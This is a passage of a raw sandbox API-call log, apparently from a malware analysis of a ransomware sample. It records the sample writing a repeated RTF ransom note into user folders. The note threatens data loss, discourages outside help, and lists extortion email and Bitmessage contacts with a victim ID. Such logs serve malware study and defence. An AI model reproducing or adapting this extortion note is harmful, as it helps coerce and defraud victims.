\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.490] WriteFile (in: hFile=0x2f0, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.491] CloseHandle (hObject=0x2f0) returned 1 [0286.491] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0286.491] GetLastError () returned 0x2 [0286.491] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.492] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR 